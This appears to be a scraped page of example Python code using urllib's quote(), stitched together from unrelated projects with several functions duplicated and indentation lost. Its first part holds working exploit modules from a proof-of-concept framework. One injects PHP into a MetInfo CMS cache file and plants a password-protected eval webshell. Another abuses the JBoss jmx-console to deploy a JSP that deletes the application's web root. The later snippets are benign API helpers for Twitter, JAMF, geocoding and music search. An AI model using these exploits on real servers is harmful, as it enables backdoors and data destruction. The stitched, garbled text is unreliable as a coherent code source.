def verify(cls, args):
url = args['options']['target']
payload = 'echo md5("beebeeto");//'
name = os.urandom(3).encode('hex')
shell_url = '%s/cache/langadmin_%s.php' % (url, name)
verify_url = (
'%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
'et_langadmin[%s][]=12345&str=%s' %
(url, name, name, urllib2.quote(payload))
)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
requests.get(verify_url)
if args['options']['verbose']:
print '[*] Request SHELL: ' + verify_url
content = requests.get(shell_url).content
if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['test_shell'] = shell_url
return args
python类quote()的实例源码
def exploit(cls, args):
url = args['options']['target']
payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//'
name = os.urandom(3).encode('hex')
shell_url = '%s/cache/langadmin_%s.php' % (url, name)
verify_url = (
'%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
'et_langadmin[%s][]=12345&str=%s' %
(url, name, name, urllib2.quote(payload))
)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
requests.get(verify_url)
if args['options']['verbose']:
print '[*] Request SHELL: ' + verify_url
content = requests.get(shell_url).content
if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['webshell'] = shell_url
args['poc_ret']['password'] = 'bb2'
return args
def verify(cls, args):
verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="'
'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin'
'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()'
';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>')
payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'
'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')
verify_data = payload % urllib2.quote(verify_code)
verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
page_content = ''
request = urllib2.Request(verify_url, verify_data)
response = urllib2.urlopen(request)
page_content = response.read()
if 'this_is_not_exist_9.1314923' in page_content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
return args
def verify(cls, args):
url = args['options']['target']
payload = 'echo md5("beebeeto");//'
name = os.urandom(3).encode('hex')
shell_url = '%s/cache/langadmin_%s.php' % (url, name)
verify_url = (
'%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
'et_langadmin[%s][]=12345&str=%s' %
(url, name, name, urllib2.quote(payload))
)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
requests.get(verify_url)
if args['options']['verbose']:
print '[*] Request SHELL: ' + verify_url
content = requests.get(shell_url).content
if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['test_shell'] = shell_url
return args
def exploit(cls, args):
url = args['options']['target']
payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//'
name = os.urandom(3).encode('hex')
shell_url = '%s/cache/langadmin_%s.php' % (url, name)
verify_url = (
'%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
'et_langadmin[%s][]=12345&str=%s' %
(url, name, name, urllib2.quote(payload))
)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
requests.get(verify_url)
if args['options']['verbose']:
print '[*] Request SHELL: ' + verify_url
content = requests.get(shell_url).content
if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['webshell'] = shell_url
args['poc_ret']['password'] = 'bb2'
return args
def verify(cls, args):
verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="'
'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin'
'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()'
';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>')
payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'
'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')
verify_data = payload % urllib2.quote(verify_code)
verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
page_content = ''
request = urllib2.Request(verify_url, verify_data)
response = urllib2.urlopen(request)
page_content = response.read()
if 'this_is_not_exist_9.1314923' in page_content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
return args
def word_seg_get(data):
output = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
if not 'SegmentResult' in output:
return {}
result = {}
output = output.decode("gbk").encode("utf-8")
#print output
#print data.encode("utf-8")
#output = output.translate(string.maketrans('\n',' '))
info_dict = json.loads(output)
segment = []
if 'SegmentResult' in info_dict:
for i in range(0, len(info_dict['SegmentResult'])):
if info_dict['SegmentResult'][i] and 'buffer' in info_dict['SegmentResult'][i]:
segment.append(info_dict['SegmentResult'][i]['buffer'])
#print info_dict['SegmentResult'][i]['buffer'].encode('utf-8')
basic = []
if 'BasicWordResult' in info_dict:
for i in range(0, len(info_dict['BasicWordResult'])):
if info_dict['BasicWordResult'][i] and 'buffer' in info_dict['BasicWordResult'][i]:
basic.append(info_dict['BasicWordResult'][i]['buffer'])
#print info_dict['SegmentResult'][i]['buffer'].encode('utf-8')
result["segment"] = segment
result["basic"] = basic
return result
def word_seg_get(data):
output = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
if not 'SegmentResult' in output:
return {}
result = {}
output = output.decode("gbk").encode("utf-8")
#print output
output = output.translate(string.maketrans('\n',' '))
info_dict = json.loads(output)
segment = []
if 'SegmentResult' in info_dict:
for i in range(0, len(info_dict['SegmentResult'])):
if info_dict['SegmentResult'][i] and 'buffer' in info_dict['SegmentResult'][i]:
segment.append(info_dict['SegmentResult'][i]['buffer'])
#print info_dict['SegmentResult'][i]['buffer'].encode('utf-8')
basic = []
if 'BasicWordResult' in info_dict:
for i in range(0, len(info_dict['BasicWordResult'])):
if info_dict['BasicWordResult'][i] and 'buffer' in info_dict['BasicWordResult'][i]:
basic.append(info_dict['BasicWordResult'][i]['buffer'])
#print info_dict['SegmentResult'][i]['buffer'].encode('utf-8')
result["segment"] = segment
result["basic"] = basic
return result
def word_seg_get(data):
output = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
if not 'SegmentResult' in output:
return {}
result = {}
output = output.decode("gbk").encode("utf-8")
#print output
output = output.translate(string.maketrans('\n',' '))
info_dict = json.loads(output)
segment = []
if 'SegmentResult' in info_dict:
for i in range(0, len(info_dict['SegmentResult'])):
if info_dict['SegmentResult'][i] and 'buffer' in info_dict['SegmentResult'][i]:
segment.append(info_dict['SegmentResult'][i]['buffer'])
#print info_dict['SegmentResult'][i]['buffer'].encode('utf-8')
basic = []
if 'BasicWordResult' in info_dict:
for i in range(0, len(info_dict['BasicWordResult'])):
if info_dict['BasicWordResult'][i] and 'buffer' in info_dict['BasicWordResult'][i]:
basic.append(info_dict['BasicWordResult'][i]['buffer'])
#print info_dict['SegmentResult'][i]['buffer'].encode('utf-8')
result["segment"] = segment
result["basic"] = basic
return result
def encode_params(self, base_url, method, params):
params = params.copy()
if self.token:
params['oauth_token'] = self.token
params['oauth_consumer_key'] = self.consumer_key
params['oauth_signature_method'] = 'HMAC-SHA1'
params['oauth_version'] = '1.0'
params['oauth_timestamp'] = str(int(time()))
params['oauth_nonce'] = str(getrandbits(64))
enc_params = urlencode_noplus(sorted(params.items()))
key = self.consumer_secret + "&" + urllib_parse.quote(self.token_secret, safe='~')
message = '&'.join(
urllib_parse.quote(i, safe='~') for i in [method.upper(), base_url, enc_params])
signature = (base64.b64encode(hmac.new(
key.encode('ascii'), message.encode('ascii'), hashlib.sha1)
.digest()))
return enc_params + "&" + "oauth_signature=" + urllib_parse.quote(signature, safe='~')
def __call__(self, twitter, options):
# We need to be pointing at search.twitter.com to work, and it is less
# tangly to do it here than in the main()
twitter.domain = "search.twitter.com"
twitter.uriparts = ()
# We need to bypass the TwitterCall parameter encoding, so we
# don't encode the plus sign, so we have to encode it ourselves
query_string = "+".join(
[quote(term)
for term in options['extra_args']])
results = twitter.search(q=query_string)['results']
f = get_formatter('search', options)
for result in results:
resultStr = f(result, options)
if resultStr.strip():
printNicely(resultStr)
def encode_params(self, base_url, method, params):
params = params.copy()
if self.token:
params['oauth_token'] = self.token
params['oauth_consumer_key'] = self.consumer_key
params['oauth_signature_method'] = 'HMAC-SHA1'
params['oauth_version'] = '1.0'
params['oauth_timestamp'] = str(int(time()))
params['oauth_nonce'] = str(getrandbits(64))
enc_params = urlencode_noplus(sorted(params.items()))
key = self.consumer_secret + "&" + urllib_parse.quote(self.token_secret, safe='~')
message = '&'.join(
urllib_parse.quote(i, safe='~') for i in [method.upper(), base_url, enc_params])
signature = (base64.b64encode(hmac.new(
key.encode('ascii'), message.encode('ascii'), hashlib.sha1)
.digest()))
return enc_params + "&" + "oauth_signature=" + urllib_parse.quote(signature, safe='~')
def __call__(self, twitter, options):
# We need to be pointing at search.twitter.com to work, and it is less
# tangly to do it here than in the main()
twitter.domain = "search.twitter.com"
twitter.uriparts = ()
# We need to bypass the TwitterCall parameter encoding, so we
# don't encode the plus sign, so we have to encode it ourselves
query_string = "+".join(
[quote(term)
for term in options['extra_args']])
results = twitter.search(q=query_string)['results']
f = get_formatter('search', options)
for result in results:
resultStr = f(result, options)
if resultStr.strip():
printNicely(resultStr)
def getComputerId(computerSearch, username, password):
computerSearch_normalized = urllib2.quote(computerSearch)
reqStr = jss_api_base_url + '/computers/match/' + computerSearch_normalized
r = sendAPIRequest(reqStr, username, password, 'GET')
if r == -1:
return -1
#responseCode = r.code
baseXml = r.read()
#print baseXml
responseXml = etree.fromstring(baseXml)
response_size = responseXml.find('size').text
if response_size == '0':
#print 'Mobile Device not found, please search again.'
return -1
elif response_size == '1':
return responseXml.find('computer/id').text
else:
#print 'Too many results, narrow your search paramaters.'
return -2
def getMobileDeviceId(mobileDeviceName, username, password):
mobileDeviceName_normalized = urllib2.quote(mobileDeviceName)
reqStr = jss_api_base_url + '/mobiledevices/match/' + mobileDeviceName_normalized
r = sendAPIRequest(reqStr, username, password, 'GET')
if r == -1:
return -1
#responseCode = r.code
baseXml = r.read()
#print baseXml
responseXml = etree.fromstring(baseXml)
response_size = responseXml.find('size').text
if response_size == '0':
#print 'Mobile Device not found, please search again.'
return -1
elif response_size == '1':
return responseXml.find('mobile_device/id').text
else:
#print 'Too many results, narrow your search paramaters.'
return -2
def updateMobileDeviceName(mobileSearch, deviceName, username, password):
print 'Updating Mobile Device name for mobile device ' + mobileSearch + ' to ' + deviceName + '...'
newDeviceName_normalized = urllib2.quote(deviceName)
mobile_id = getSupervisedMobileDeviceId(mobileSearch, username, password)
if str(mobile_id) == '-1':
print 'Mobile device ' + mobileSearch + ' not found, please try again.'
return -1
elif str(mobile_id) == '-2':
print 'More than one mobile device matching search string ' + str(mobileSearch) + ', please try again.'
return -1
elif str(mobile_id) == '-3':
print 'Device found, but is not supervised.'
postStr = jss_api_base_url + '/mobiledevicecommands/command/DeviceName/' + newDeviceName_normalized + '/id/' + mobile_id
postXML = "<mobile_device_command><command>DeviceName</command><mobile_devices><mobile_device><id>" + mobile_id + "</id><device_name>" + deviceName + "</device_name></mobile_device></mobile_devices></mobile_device_command>"
def getComputerGroupId(groupSearch, username, password):
groupSearch_normalized = urllib2.quote(groupSearch)
reqStr = jss_api_base_url + '/computergroups/name/' + groupSearch_normalized
r = sendAPIRequest(reqStr, username, password, 'GET')
if r != -1:
responseCode = r.code
#print 'Response Code: ' + str(responseCode)
baseXml = r.read()
responseXml = etree.fromstring(baseXml)
computerGroupId = responseXml.find('id').text
#print computerGroupId
return computerGroupId
else:
#print 'Group not found.'
return -1
def rawGeocoder(self, query):
# http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2
add = query + ", Argentina"
add = urllib2.quote(add.encode('utf8'))
geocode_url = "http://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % add
req = urllib2.urlopen(geocode_url)
res = json.loads(req.read())
# comprehension para parsear lo devuelto por el google geocoder
ret = [
{
'nombre' : i["formatted_address"],
'precision': len(i["address_components"]) / 6,
'geom' : "POINT(" + str(i["geometry"]["location"]["lng"]) + " " + str(i["geometry"]["location"]["lat"]) + ")",
'tipo' : "rawGeocoder"
}
for i in res["results"]
]
return ret
def direccionPostal(self, calle, numero, ciudad_slug):
# http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2
import urllib2
import json
add = calle + " " + numero + ", " + ciudad_slug + ", Argentina"
add = urllib2.quote(add.encode('utf8'))
geocode_url = "http://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % add
req = urllib2.urlopen(geocode_url)
res = json.loads(req.read())
# comprehension para parsear lo devuelto por el google geocoder
ret = [
{
'nombre' : i["formatted_address"],
'precision': 1,
'geom' : "POINT(" + str(i["geometry"]["location"]["lng"]) + " " + str(i["geometry"]["location"]["lat"]) + ")",
'tipo' : "direccionPostal"
}
for i in res["results"]
if "street_address" in i["types"]
]
return ret
def get_trackid_from_text_search(title,artistname=''):
"""
Search for an artist + title using 7digital search API
Return None if there is a problem, or tuple (title,trackid)
"""
url = 'http://api.7digital.com/1.2/track/search?'
url += 'oauth_consumer_key='+DIGITAL7_API_KEY
query = title
if artistname != '':
query = artistname + ' ' + query
query = urllib2.quote(query)
url += '&q='+query
xmldoc = url_call(url)
status = xmldoc.getAttribute('status')
if status != 'ok':
return None
resultelem = xmldoc.getElementsByTagName('searchResult')
if len(resultelem) == 0:
return None
track = resultelem[0].getElementsByTagName('track')[0]
tracktitle = track.getElementsByTagName('title')[0].firstChild.data
trackid = int(track.getAttribute('id'))
return (tracktitle,trackid)
